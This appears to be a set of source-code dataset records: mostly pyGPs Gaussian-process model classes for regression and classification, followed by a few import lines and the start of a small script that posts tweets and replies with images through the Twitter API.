if isinstance(self.likfunc, lik.Erf): #or is instance(self.likfunc, lik.Logistic):
uy = unique(self.y)
ind = ( uy != 1 )
if any( uy[ind] != -1):
raise Exception('You attempt classification using labels different from {+1,-1}')
if not der:
post, nlZ = self.inffunc.evaluate(self.meanfunc, self.covfunc, self.likfunc, self.x, self.y, 2)
self.nlZ = nlZ
self.posterior = deepcopy(post)
return nlZ, post
else:
post, nlZ, dnlZ = self.inffunc.evaluate(self.meanfunc, self.covfunc, self.likfunc, self.x, self.y, 3)
self.nlZ = nlZ
self.dnlZ = deepcopy(dnlZ)
self.posterior = deepcopy(post)
return nlZ, dnlZ, post
def predict(self, xs, ys=None):
'''
Prediction of test points (given by xs) based on training data of the current model.
This method will output the following value:\n
predictive output means(ym),\n
predictive output variances(ys2),\n
predictive latent means(fm),\n
predictive latent variances(fs2),\n
log predictive probabilities(lp).\n
Theses values can also be achieved from model's property. (e.g. model.ym)
:param xs: test input in shape of nn by D
:param ys: test target(optional) in shape of nn by 1 if given
:return: ym, ys2, fm, fs2, lp
'''
# check the shape of inputs
# transform to correct shape if neccessary
if xs.ndim == 1:
xs = np.reshape(xs, (xs.shape[0],1))
self.xs = xs
if not ys is None:
if ys.ndim == 1:
ys = np.reshape(ys, (ys.shape[0],1))
self.ys = ys
meanfunc = self.meanfunc
covfunc = self.covfunc
likfunc = self.likfunc
inffunc = self.inffunc
x = self.x
y = self.y
if self.posterior is None:
self.getPosterior()
alpha = self.posterior.alpha
L = self.posterior.L
sW = self.posterior.sW
nz = list(range(len(alpha[:,0]))) # non-sparse representation
if len(L) == 0: # in case L is not provided, we compute it
K = covfunc.getCovMatrix(x=x[nz,:], mode='train')
#L = np.linalg.cholesky( (np.eye(nz) + np.dot(sW,sW.T)*K).T )
L = jitchol( (np.eye(len(nz)) + np.dot(sW,sW.T)*K).T )
Ltril = np.all( np.tril(L,-1) == 0 ) # is L an upper triangular matrix?
ns = xs.shape[0] # number of data points
nperbatch = 1000 # number of data points per mini batch
nact = 0 # number of already processed test data points
ymu = np.zeros((ns,1))
ys2 = np.zeros((ns,1))
fmu = np.zeros((ns,1))
fs2 = np.zeros((ns,1))
lp = np.zeros((ns,1))
while nact<=ns-1: # process minibatches of test cases to save memory
ids = list(range(nact,min(nact+nperbatch,ns))) # data points to process
kss = covfunc.getCovMatrix(z=xs[ids,:], mode='self_test') # self-variances
if isinstance(covfunc, FITCOfKernel):
Ks = covfunc.getCovMatrix(x=x, z=xs[ids,:], mode='cross') # cross-covariances
Ks = Ks[nz,:]
else:
Ks = covfunc.getCovMatrix(x=x[nz,:], z=xs[ids,:], mode='cross') # cross-covariances
ms = meanfunc.getMean(xs[ids,:])
N = (alpha.shape)[1] # number of alphas (usually 1; more in case of sampling)
Fmu = np.tile(ms,(1,N)) + np.dot(Ks.T,alpha[nz]) # conditional mean fs|f
fmu[ids] = np.reshape(old_div(Fmu.sum(axis=1),N),(len(ids),1)) # predictive means
if Ltril: # L is triangular => use Cholesky parameters (alpha,sW,L)
V = np.linalg.solve(L.T,np.tile(sW,(1,len(ids)))*Ks)
fs2[ids] = kss - np.array([(V*V).sum(axis=0)]).T # predictive variances
else: # L is not triangular => use alternative parametrization
fs2[ids] = kss + np.array([(Ks*np.dot(L,Ks)).sum(axis=0)]).T # predictive variances
fs2[ids] = np.maximum(fs2[ids],0) # remove numerical noise i.e. negative variances
Fs2 = np.tile(fs2[ids],(1,N)) # we have multiple values in case of sampling
if ys is None:
Lp, Ymu, Ys2 = likfunc.evaluate(None,Fmu[:],Fs2[:],None,None,3)
else:
Lp, Ymu, Ys2 = likfunc.evaluate(np.tile(ys[ids],(1,N)), Fmu[:], Fs2[:],None,None,3)
lp[ids] = np.reshape( old_div(np.reshape(Lp,(np.prod(Lp.shape),N)).sum(axis=1),N) , (len(ids),1) ) # log probability; sample averaging
ymu[ids] = np.reshape( old_div(np.reshape(Ymu,(np.prod(Ymu.shape),N)).sum(axis=1),N) ,(len(ids),1) ) # predictive mean ys|y and ...
ys2[ids] = np.reshape( old_div(np.reshape(Ys2,(np.prod(Ys2.shape),N)).sum(axis=1),N) , (len(ids),1) ) # .. variance
nact = ids[-1]+1 # set counter to index of next data point
self.ym = ymu
self.ys2 = ys2
self.lp = lp
self.fm = fmu
self.fs2 = fs2
if ys is None:
return ymu, ys2, fmu, fs2, None
else:
return ymu, ys2, fmu, fs2, lp
def predict_with_posterior(self, post, xs, ys=None):
'''
Prediction of test points (given by xs) based on training data
of the current model with posterior already provided.
(i.e. you already have the posterior and thus don't need the fitting phase.)
This method will output the following value:\n
predictive output means(ym),\n
predictive output variances(ys2),\n
predictive latent means(fm),\n
predictive latent variances(fs2),\n
log predictive probabilities(lp).\n
Theses values can also be achieved from model's property. (e.g. model.ym)
:param post: struct representation of posterior
:param xs: test input
:param ys: test target(optional)
:return: ym, ys2, fm, fs2, lp
'''
# check the shape of inputs
# transform to correct shape if neccessary
if xs.ndim == 1:
xs = np.reshape(xs, (xs.shape[0],1))
self.xs = xs
if not ys is None:
if ys.ndim == 1:
ys = np.reshape(ys, (ys.shape[0],1))
self.ys = ys
meanfunc = self.meanfunc
covfunc = self.covfunc
likfunc = self.likfunc
inffunc = self.inffunc
x = self.x
y = self.y
self.posterior = deepcopy(post)
alpha = post.alpha
L = post.L
sW = post.sW
nz = list(range(len(alpha[:,0]))) # non-sparse representation
if len(L) == 0: # in case L is not provided, we compute it
K = covfunc.getCovMatrix(x=x[nz,:], mode='train')
#L = np.linalg.cholesky( (np.eye(nz) + np.dot(sW,sW.T)*K).T )
L = jitchol( (np.eye(len(nz)) + np.dot(sW,sW.T)*K).T )
Ltril = np.all( np.tril(L,-1) == 0 ) # is L an upper triangular matrix?
ns = xs.shape[0] # number of data points
nperbatch = 1000 # number of data points per mini batch
nact = 0 # number of already processed test data points
ymu = np.zeros((ns,1))
ys2 = np.zeros((ns,1))
fmu = np.zeros((ns,1))
fs2 = np.zeros((ns,1))
lp = np.zeros((ns,1))
while nact<=ns-1: # process minibatches of test cases to save memory
id = list(range(nact,min(nact+nperbatch,ns))) # data points to process
kss = covfunc.getCovMatrix(z=xs[id,:], mode='self_test') # self-variances
Ks = covfunc.getCovMatrix(x=x[nz,:], z=xs[id,:], mode='cross') # cross-covariances
ms = meanfunc.getMean(xs[id,:])
N = (alpha.shape)[1] # number of alphas (usually 1; more in case of sampling)
Fmu = np.tile(ms,(1,N)) + np.dot(Ks.T,alpha[nz]) # conditional mean fs|f
fmu[id] = np.reshape(old_div(Fmu.sum(axis=1),N),(len(id),1)) # predictive means
if Ltril: # L is triangular => use Cholesky parameters (alpha,sW,L)
V = np.linalg.solve(L.T,np.tile(sW,(1,len(id)))*Ks)
fs2[id] = kss - np.array([(V*V).sum(axis=0)]).T # predictive variances
else: # L is not triangular => use alternative parametrization
fs2[id] = kss + np.array([(Ks*np.dot(L,Ks)).sum(axis=0)]).T # predictive variances
fs2[id] = np.maximum(fs2[id],0) # remove numerical noise i.e. negative variances
Fs2 = np.tile(fs2[id],(1,N)) # we have multiple values in case of sampling
if ys is None:
[Lp, Ymu, Ys2] = likfunc.evaluate(None,Fmu[:],Fs2[:],None,None,3)
else:
[Lp, Ymu, Ys2] = likfunc.evaluate(np.tile(ys[id],(1,N)), Fmu[:], Fs2[:],None,None,3)
lp[id] = np.reshape( old_div(np.reshape(Lp,(np.prod(Lp.shape),N)).sum(axis=1),N) , (len(id),1) ) # log probability; sample averaging
ymu[id] = np.reshape( old_div(np.reshape(Ymu,(np.prod(Ymu.shape),N)).sum(axis=1),N) ,(len(id),1) ) # predictive mean ys|y and ...
ys2[id] = np.reshape( old_div(np.reshape(Ys2,(np.prod(Ys2.shape),N)).sum(axis=1),N) , (len(id),1) ) # .. variance
nact = id[-1]+1 # set counter to index of next data point
self.ym = ymu
self.ys2 = ys2
self.lp = lp
self.fm = fmu
self.fs2 = fs2
if ys is None:
return ymu, ys2, fmu, fs2, None
else:
return ymu, ys2, fmu, fs2, lp
class GPR(GP):
'''
Model for Gaussian Process Regression
'''
def __init__(self):
super(GPR, self).__init__()
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
self.likfunc = lik.Gauss() # likihood with default noise variance 0.1
self.inffunc = inf.Exact() # inference method
self.optimizer = opt.Minimize(self) # default optimizer
def setNoise(self,log_sigma):
'''
Set noise other than default noise value
:param log_sigma: logarithm of the noise sigma
'''
self.likfunc = lik.Gauss(log_sigma)
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
Overriding. Usage see base class pyGPs.gp.GP.setOptimizer
'''
conf = None
if (num_restarts!=None) or (min_threshold!=None):
conf = pyGPs.Optimization.conf.random_init_conf(self.meanfunc,self.covfunc,self.likfunc)
conf.num_restarts = num_restarts
conf.min_threshold = min_threshold
if not meanRange is None:
conf.meanRange = meanRange
if not covRange is None:
conf.covRange = covRange
if not likRange is None:
conf.likRange = likRange
if method == "Minimize":
self.optimizer = opt.Minimize(self,conf)
elif method == "SCG":
self.optimizer = opt.SCG(self,conf)
elif method == "CG":
self.optimizer = opt.CG(self,conf)
elif method == "BFGS":
self.optimizer = opt.BFGS(self,conf)
elif method == "Nelder-Mead":
self.optimizer = opt.Simplex(self, conf)
else:
raise Exception('Optimization method is not set correctly in setOptimizer')
def plot(self,axisvals=None):
'''
Plot 1d GP regression result.
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
'''
xs = self.xs # test point
x = self.x
y = self.y
ym = self.ym # predictive test mean
ys2 = self.ys2 # predictive test variance
plt.figure()
xss = np.reshape(xs,(xs.shape[0],))
ymm = np.reshape(ym,(ym.shape[0],))
ys22 = np.reshape(ys2,(ys2.shape[0],))
plt.plot(x, y, color=DATACOLOR, ls='None', marker='+',ms=12, mew=2)
plt.plot(xs, ym, color=MEANCOLOR, ls='-', lw=3.)
plt.fill_between(xss,ymm + 2.*np.sqrt(ys22), ymm - 2.*np.sqrt(ys22), facecolor=SHADEDCOLOR,linewidths=0.0)
plt.grid()
if not axisvals is None:
plt.axis(axisvals)
plt.xlabel('input x')
plt.ylabel('target y')
plt.show()
def useInference(self, newInf):
'''
Use another inference techinique other than default exact inference.
:param str newInf: 'Laplace' or 'EP'
'''
if newInf == "Laplace":
self.inffunc = inf.Laplace()
elif newInf == "EP":
self.inffunc = inf.EP()
else:
raise Exception('Possible inf values are "Laplace", "EP".')
def useLikelihood(self,newLik):
'''
Use another likelihood function other than default Gaussian likelihood.
:param str newLik: 'Laplace'
'''
if newLik == "Laplace":
self.likfunc = lik.Laplace()
self.inffunc = inf.EP()
else:
raise Exception('Possible lik values are "Laplace".')
class GPC(GP):
'''
Model for Gaussian Process Classification.
'''
def __init__(self):
super(GPC, self).__init__()
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
self.likfunc = lik.Erf() # erf likihood
self.inffunc = inf.EP() # default inference method
self.optimizer = opt.Minimize(self) # default optimizer
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
Overriding. Usage see base class pyGPs.gp.GP.setOptimizer
'''
conf = None
if (num_restarts!=None) or (min_threshold!=None):
conf = pyGPs.Optimization.conf.random_init_conf(self.meanfunc,self.covfunc,self.likfunc)
conf.num_restarts = num_restarts
conf.min_threshold = min_threshold
if not meanRange is None:
conf.meanRange = meanRange
if not covRange is None:
conf.covRange = covRange
if not likRange is None:
conf.likRange = likRange
if method == "Minimize":
self.optimizer = opt.Minimize(self,conf)
elif method == "SCG":
self.optimizer = opt.SCG(self,conf)
elif method == "CG":
self.optimizer = opt.CG(self,conf)
elif method == "BFGS":
self.optimizer = opt.BFGS(self,conf)
def plot(self,x1,x2,t1,t2,axisvals=None):
'''
Plot 2d GP Classification result.
For plotting, we superimpose the data points with the posterior equi-probability contour
lines for the probability of class two given complete information about the generating mechanism.
:param x1: inputs for class +1
:param x2: inputs for class -1
:param t1: meshgrid array for the first axis
:param t2: meshgrid array for the second axis
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
Note these parameters are (only) used for our hard-coded data for classification demo.
'''
fig = plt.figure()
plt.plot(x1[:,0], x1[:,1], 'b+', markersize = 12)
plt.plot(x2[:,0], x2[:,1], 'r+', markersize = 12)
pc = plt.contour(t1, t2, np.reshape(np.exp(self.lp), (t1.shape[0],t1.shape[1]) ))
fig.colorbar(pc)
plt.grid()
if not axisvals is None:
plt.axis(axisvals)
plt.show()
def useInference(self, newInf):
'''
Use another inference techinique other than default EP inference.
:param str newInf: 'Laplace'
'''
if newInf == "Laplace":
self.inffunc = inf.Laplace()
else:
raise Exception('Possible inf values are "Laplace".')
def useLikelihood(self,newLik):
'''
Use another likelihood function other than default error function.
(Not used in this version)
:param str newLik: 'Logistic'
'''
if newLik == "Logistic":
raise Exception("Logistic likelihood is currently not implemented.")
#self.likfunc = lik.Logistic()
else:
raise Exception('Possible lik values are "Logistic".')
class GPMC(object):
'''
This is a one vs. one classification wrapper for GP Classification
'''
def __init__(self, n_class):
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
self.n_class = n_class # number of different classes
self.x_all = None
self.y_all = None
self.newInf = None # new inference? -> call useInference
self.newLik = None # new likelihood? -> call useLikelihood
self.newPrior = False
def setPrior(self, mean=None, kernel=None):
'''
Set prior mean and covariance other than the default setting of current model.
:param mean: instance of mean class. (e.g. mean.Linear())
:param kernel: instance of covariance class. (e.g. cov.RBF())
'''
# check the type of inputs
# ensure they are the right class before setting prior
if not mean is None:
assert isinstance(mean, pyGPs.mean.Mean), "mean function is not an instance of pyGPs.mean.Mean"
self.meanfunc = mean
self.usingDefaultMean = False
if not kernel is None:
assert isinstance(kernel, pyGPs.cov.Kernel), "cov function is not an instance of pyGPs.cov.Kernel"
self.covfunc = kernel
if type(kernel) is cov.Pre:
self.usingDefaultMean = False
self.newPrior = True
def useInference(self, newInf):
'''
Use another inference techinique other than default EP inference.
:param str newInf: 'Laplace'
'''
if newInf == "Laplace":
self.inffunc = inf.Laplace()
else:
raise Exception('Possible inf values are "Laplace".')
def useLikelihood(self,newLik):
'''
Use another likelihood function other than default error function.
(Not used in this version)
:param str newLik: 'Logistic'
'''
if newLik == "Logistic":
raise Exception("Logistic likelihood is currently not implemented.")
#self.likfunc = lik.Logistic()
else:
raise Exception('Possible lik values are "Logistic".')
def setData(self,x,y):
'''
Set training inputs and traning labels to model.
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
Note this method will transform x, y to correct shape
if x, y is given in 1d array.
'''
# check wether the number of inputs and labels match
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.x_all = x
self.y_all = y
def fitAndPredict(self, xs):
'''
Fit the model with given training data and predict for test points (given by xs).
predictive_vote is a matrix where row i is each test point i,
and column j is the probability for being class j
:param xs: test inputs in shape of nn by D
:return: predictive_vote
'''
# check the shape of inputs
if xs.ndim == 1:
xs = np.reshape(xs, (xs.shape[0],1))
predictive_vote = np.zeros((xs.shape[0],self.n_class))
for i in range(self.n_class): # classifier for class i...
for j in range(i+1,self.n_class): # ...and class j
x,y = self.createBinaryClass(i,j)
model = GPC()
if self.newPrior:
model.setPrior(mean=self.meanfunc, kernel=self.covfunc)
if self.newInf:
model.useInference(self.newInf)
if self.newLik:
model.useLikelihood(self.newLik)
model.getPosterior(x,y) # fitting
ym = model.predict(xs)[0]
ym += 1 # now scale into 0 to 2, ym=0 is class j, ym=2 is class i
vote_i = np.zeros((xs.shape[0],self.n_class))
vote_j = np.zeros((xs.shape[0],self.n_class))
vote_i[:,i:i+1] = ym
vote_j[:,j:j+1] = 2-ym
predictive_vote += vote_i
predictive_vote += vote_j
predictive_vote /= predictive_vote.sum(axis=1)[:,np.newaxis]
return predictive_vote
def optimizeAndPredict(self, xs):
'''
Optimize the model with given training data and predict for test points (given by xs).
predictive_vote is a matrix where row i is each test point i,
and column j is the probability for being class j
:param xs: test inputs in shape of nn by D
:return: predictive_vote
'''
# check the shape of inputs
if xs.ndim == 1:
xs = np.reshape(xs, (xs.shape[0],1))
predictive_vote = np.zeros((xs.shape[0],self.n_class))
for i in range(self.n_class): # classifier for class i...
for j in range(i+1,self.n_class): # ...and class j
x,y = self.createBinaryClass(i,j)
model = GPC()
if self.newPrior:
model.setPrior(mean=self.meanfunc, kernel=self.covfunc)
if self.newInf:
model.useInference(self.newInf)
if self.newLik:
model.useLikelihood(self.newLik)
model.optimize(x,y) # training
ym = model.predict(xs)[0]
ym += 1 # now scale into 0 to 2, ym=0 is class j, ym=2 is class i
vote_i = np.zeros((xs.shape[0],self.n_class))
vote_j = np.zeros((xs.shape[0],self.n_class))
vote_i[:,i:i+1] = ym
vote_j[:,j:j+1] = 2-ym
predictive_vote += vote_i
predictive_vote += vote_j
predictive_vote /= predictive_vote.sum(axis=1)[:,np.newaxis]
return predictive_vote
def createBinaryClass(self, i,j):
'''
Create dataset x(data) and y(label) which only contains class i and j.
Relabel class i to +1 and class j to -1
:param int i: the i_th class
:param int j: the j_th class
:return: x(data) and y(label) which only contains class i and j
'''
class_i = []
class_j = []
for index in range(len(self.y_all)): # check all classes
target = self.y_all[index]
if target == i:
class_i.append(index)
elif target == j:
class_j.append(index)
n1 = len(class_i)
n2 = len(class_j)
class_i.extend(class_j)
x = self.x_all[class_i,:]
y = np.concatenate((np.ones((1,n1)),-np.ones((1,n2))),axis=1).T
return x,y
class GP_FITC(GP):
'''
Model for FITC GP base class
'''
def __init__(self):
super(GP_FITC, self).__init__()
self.u = None # inducing points
def setData(self, x, y, value_per_axis=5):
'''
Set training inputs and traning labels to model and derive deault inducing_points..
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
:param int value_per_axis: number of value in each dimension
when using a uni-distant default inducing points
Note this method will transform x, y to correct shape
if x, y is given in 1d array.
'''
# check wether the number of inputs and labels match
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check dimension of inputs
# transform to correct shape if neccessary
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.x = x
self.y = y
if self.usingDefaultMean:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
# get range of x in each dimension
# 5 uniformally selected value for each dimension
gridAxis=[]
for d in range(x.shape[1]):
column = x[:,d]
mini = np.min(column)
maxi = np.max(column)
axis = np.linspace(mini,maxi,value_per_axis)
gridAxis.append(axis)
# default inducing points-> a grid
if self.u is None:
self.u = np.array(list(itertools.product(*gridAxis)))
self.covfunc = self.covfunc.fitc(self.u)
def setPrior(self, mean=None, kernel=None, inducing_points=None):
'''
Set prior mean and covariance other than the default setting of current model,
as well as the inducing points
:param mean: instance of mean class. (e.g. mean.Linear())
:param kernel: instance of covariance class. (e.g. cov.RBF())
:inducing_points: matrix of inducing points in shape of (nu,D)
'''
if not kernel is None:
if not inducing_points is None:
self.covfunc = kernel.fitc(inducing_points)
self.u = inducing_points
else:
if not self.u is None:
self.covfunc = kernel.fitc(self.u)
else:
raise Exception("To use default inducing points, please call setData() first!")
if type(kernel) is cov.Pre:
self.usingDefaultMean = False
if not mean is None:
self.meanfunc = mean
self.usingDefaultMean = False
class GPR_FITC(GP_FITC):
'''
Model for Gaussian Process Regression FITC
'''
def __init__(self):
super(GPR_FITC, self).__init__()
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
self.likfunc = lik.Gauss() # likihood with default noise variance 0.1
self.inffunc = inf.FITC_Exact() # inference method
self.optimizer = opt.Minimize(self) # default optimizer
self.u = None # no default inducing points
def setNoise(self,log_sigma):
'''
Set noise other than default noise value
:param log_sigma: logarithm of the noise sigma
'''
self.likfunc = lik.Gauss(log_sigma)
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
Overriding. Usage see base class pyGPs.gp.GP.setOptimizer
'''
conf = None
if (num_restarts!=None) or (min_threshold!=None):
conf = pyGPs.Optimization.conf.random_init_conf(self.meanfunc,self.covfunc,self.likfunc)
conf.num_restarts = num_restarts
conf.min_threshold = min_threshold
if not meanRange is None:
conf.meanRange = meanRange
if not covRange is None:
conf.covRange = covRange
if not likRange is None:
conf.likRange = likRange
if method == "Minimize":
self.optimizer = opt.Minimize(self,conf)
elif method == "SCG":
self.optimizer = opt.SCG(self,conf)
elif method == "CG":
self.optimizer = opt.CG(self,conf)
elif method == "BFGS":
self.optimizer = opt.BFGS(self,conf)
def plot(self,axisvals=None):
'''
Plot 1d GP FITC Regression result.
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
'''
plt.figure()
xss = np.reshape(self.xs,(self.xs.shape[0],))
ymm = np.reshape(self.ym,(self.ym.shape[0],))
ys22 = np.reshape(self.ys2,(self.ys2.shape[0],))
plt.plot(self.x, self.y, color=DATACOLOR, ls='None', marker='+',ms=12, mew=2)
plt.plot(self.xs, self.ym, color=MEANCOLOR, ls='-', lw=3.)
plt.fill_between(xss,ymm + 2.*np.sqrt(ys22), ymm - 2.*np.sqrt(ys22), facecolor=SHADEDCOLOR,linewidths=0.0)
plt.grid()
if not axisvals is None:
plt.axis(axisvals)
plt.xlabel('input x')
plt.ylabel('output y')
plt.plot(self.u,np.ones_like(self.u), ls='None', color='k',marker='x',markersize=12,mew=2)
plt.show()
def useInference(self, newInf):
'''
Use another inference techinique other than default exact inference.
:param str newInf: 'Laplace' or 'EP'
'''
if newInf == "Laplace":
self.inffunc = inf.FITC_Laplace()
elif newInf == "EP":
self.inffunc = inf.FITC_EP()
else:
raise Exception('Possible inf values are "Laplace", "EP".')
def useLikelihood(self,newLik):
'''
Use another inference techinique other than default Gaussian likelihood.
:param str newLik: 'Laplace'
'''
if newLik == "Laplace":
self.likfunc = lik.Laplace()
self.inffunc = inf.FITC_EP()
else:
raise Exception('Possible lik values are "Laplace".')
class GPC_FITC(GP_FITC):
'''
Model for Gaussian Process Classification FITC
'''
def __init__(self):
super(GPC_FITC, self).__init__()
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
self.likfunc = lik.Erf() # erf liklihood
self.inffunc = inf.FITC_EP() # default inference method
self.optimizer = opt.Minimize(self) # default optimizer
self.u = None # no default inducing points
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
Overriding. Usage see base class pyGPs.gp.GP.setOptimizer
'''
conf = None
if (num_restarts!=None) or (min_threshold!=None):
conf = pyGPs.Optimization.conf.random_init_conf(self.meanfunc,self.covfunc,self.likfunc)
conf.num_restarts = num_restarts
conf.min_threshold = min_threshold
if not meanRange is None:
conf.meanRange = meanRange
if not covRange is None:
conf.covRange = covRange
if not likRange is None:
conf.likRange = likRange
if method == "Minimize":
self.optimizer = opt.Minimize(self,conf)
elif method == "SCG":
self.optimizer = opt.SCG(self,conf)
elif method == "CG":
self.optimizer = opt.CG(self,conf)
elif method == "BFGS":
self.optimizer = opt.BFGS(self,conf)
def plot(self,x1,x2,t1,t2,axisvals=None):
'''Plot 2d GP FITC classification.
For plotting, we superimpose the data points with the posterior equi-probability contour
lines for the probability of class two given complete information about the generating mechanism.
:param x1: inputs for class +1
:param x2: inputs for class -1
:param t1: meshgrid array for the first axis
:param t2: meshgrid array for the second axis
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
Note these parameters are (only) used for our hard-coded data for classification demo.
'''
fig = plt.figure()
plt.plot(x1[:,0], x1[:,1], 'b+', markersize = 12)
plt.plot(x2[:,0], x2[:,1], 'r+', markersize = 12)
plt.plot(self.u[:,0],self.u[:,1],'ko', markersize=12)
pc = plt.contour(t1, t2, np.reshape(np.exp(self.lp), (t1.shape[0],t1.shape[1]) ))
fig.colorbar(pc)
plt.grid()
if not axisvals is None:
plt.axis(axisvals)
plt.show()
def useInference(self, newInf):
'''
Use another inference techinique other than default exact inference.
:param str newInf: 'Laplace' or 'EP'
'''
if newInf == "Laplace":
self.inffunc = inf.FITC_Laplace()
else:
raise Exception('Possible inf values are "Laplace".')
def useLikelihood(self,newLik):
'''
Use another inference techinique other than default Erf likelihood.
(Not used in this version)
:param str newLik: 'Logistic'
'''
if newLik == "Logistic":
raise Exception("Logistic likelihood is currently not implemented.")
else:
raise Exception('Possible lik values are "Logistic".')
| 40.450321
| 156
| 0.563389
| 6,480
| 50,482
| 4.349228
| 0.091975
| 0.010006
| 0.011922
| 0.009935
| 0.806337
| 0.780861
| 0.753504
| 0.739204
| 0.721676
| 0.699571
| 0
| 0.01585
| 0.331385
| 50,482
| 1,247
| 157
| 40.482759
| 0.819127
| 0.335189
| 0
| 0.726068
| 0
| 0
| 0.092209
| 0
| 0
| 0
| 0
| 0
| 0.014728
| 1
| 0.067747
| false
| 0.001473
| 0.022091
| 0
| 0.116348
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f728acca0a7a5018263431ea24aa5a8ba6852f87
| 154
|
py
|
Python
|
tests/reporting/review/api.py
|
ctk3b/borderline
|
7c4ab891b36c97038940dea678718dea8ebf5060
|
[
"MIT"
] | null | null | null |
tests/reporting/review/api.py
|
ctk3b/borderline
|
7c4ab891b36c97038940dea678718dea8ebf5060
|
[
"MIT"
] | 4
|
2021-09-17T00:53:47.000Z
|
2021-09-24T22:05:13.000Z
|
tests/reporting/review/api.py
|
ctk3b/borderline
|
7c4ab891b36c97038940dea678718dea8ebf5060
|
[
"MIT"
] | null | null | null |
import reporting.report_builder.api
import reporting.report_builder.this_is_a_violation
import reporting.report_builder.this_is_a_grandfathered_violation
| 38.5
| 65
| 0.922078
| 22
| 154
| 6
| 0.454545
| 0.340909
| 0.477273
| 0.636364
| 0.530303
| 0.530303
| 0.530303
| 0
| 0
| 0
| 0
| 0
| 0.038961
| 154
| 3
| 66
| 51.333333
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f799e614ddaa65cbeb6970a474d2212c8c9e8cd5
| 130
|
py
|
Python
|
api/user_control/admin.py
|
richeshgupta/SecureBit
|
89a95e7e4df2276294f76803a7bc5b8d7f99d436
|
[
"MIT"
] | 1
|
2021-07-03T04:51:55.000Z
|
2021-07-03T04:51:55.000Z
|
api/user_control/admin.py
|
richeshgupta/SecureBit
|
89a95e7e4df2276294f76803a7bc5b8d7f99d436
|
[
"MIT"
] | 6
|
2021-03-24T11:23:41.000Z
|
2022-02-27T12:24:37.000Z
|
api/user_control/admin.py
|
richeshgupta/SecureBit
|
89a95e7e4df2276294f76803a7bc5b8d7f99d436
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import CustomUser, Jwt, Favorite
admin.site.register((CustomUser, Jwt, Favorite))
| 21.666667
| 48
| 0.792308
| 17
| 130
| 6.058824
| 0.647059
| 0.252427
| 0.407767
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 130
| 5
| 49
| 26
| 0.895652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3a7cbc8374af3fd768fb93949f32d80b7061feb
| 2,704
|
py
|
Python
|
src/post.py
|
BaseOutside/twiapi-wrapper
|
b2d55d0f56431cd0e23038300024e55e61e54ca4
|
[
"MIT"
] | null | null | null |
src/post.py
|
BaseOutside/twiapi-wrapper
|
b2d55d0f56431cd0e23038300024e55e61e54ca4
|
[
"MIT"
] | null | null | null |
src/post.py
|
BaseOutside/twiapi-wrapper
|
b2d55d0f56431cd0e23038300024e55e61e54ca4
|
[
"MIT"
] | null | null | null |
import config
import json
import base64
def tweet(text, *img):
if len(img) > 4:
print("too many images")
return -1
if type(text) != str:
text = str(text)
twitter = config.twitter
url = "https://api.twitter.com/1.1/statuses/update.json"
url_img = "https://upload.twitter.com/1.1/media/upload.json"
media_id = []
for i in range(len(img)):
files = {"media" : img[i]}
res_img = twitter.post(url_img, files = files)
if res_img.status_code != 200:
print("Failed to upload image : %s" % res_img.text)
return -1
media_id.append(json.loads(res_img.text)["media_id"])
if len(media_id) == 0:
params = {"status" : text}
else:
params = {"status" : text, "media_ids" : ",".join(map(str, media_id))}
res = twitter.post(url, params = params)
if res.status_code != 200:
print("Post tweet failed : %s" % res.text)
def reply(in_reply_to_status_id, text, *img):
if len(img) > 4:
print("too many images")
return -1
if type(text) != str:
text = str(text)
twitter = config.twitter
url = "https://api.twitter.com/1.1/statuses/update.json"
